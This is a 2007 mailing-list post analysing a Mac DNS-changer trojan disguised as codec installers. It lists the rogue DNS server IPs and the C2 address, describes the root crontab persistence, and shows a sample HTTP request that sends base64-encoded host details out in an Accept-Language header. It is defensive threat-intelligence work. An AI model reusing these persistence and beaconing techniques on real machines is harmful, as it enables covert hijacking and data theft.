To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
I've analyzed two variants of this trojan, procoded1000.dmg and ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).
These trojans basically consist of three scripts and a browser plugin
(used by Safari / Firefox? I'm not sure.).
On the disk image:
- install.pkg/Contents/Resources/post{install,upgrade} are the same
script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is
the same as above preinstall scripts
Only difference between two packages appears to be the dns servers:
procodec1000:
s1=85.255.116.61
s2=85.255.112.103
ultracodec1000:
s1=85.255.115.34
s2=85.255.112.158
- Preinstall scripts (and plugins.settings from Archive.pax.gz, which
is the same) sets the compromised machine's DNS to the above servers
(depending on which trojan is installed). In addition, it tries to set
a crontab for root that executes itself (as
/Library/Internet Plug-Ins/plugins.settings) once a minute.
- Postinstall scripts executes sendreq (found in Archive.pax.gz), and
then removes sendreq. sendreq sends 'mac;<cpu type>;<hostname>' as a
base64-encoded argument to the 'Accept-Language' header to
85.255.121.37.
Example:
GET / HTTP/1.1
Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
Host: 85.255.121.37
- Installs
/Library/Internet
Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
I'm not certain what this does. There's not much by way of suspicious
strings in this executable, and I don't have a way to safely execute it
to watch what it does.
Interesting strings (for antivirus or overly suspcious sysadmins :) ):
install.pkg/Contents/Resources/English.lproj/Description.plist:
<string>Its a suppa puppa desc yo</string>
In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
Verified RoveSupa Plugin
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
Verified RoveSupa Plugin
On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:
> Sure, I saved a couple copies. I'll send you a link in a second email. If
> anyone else is interested in a copy, please let me know.
--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
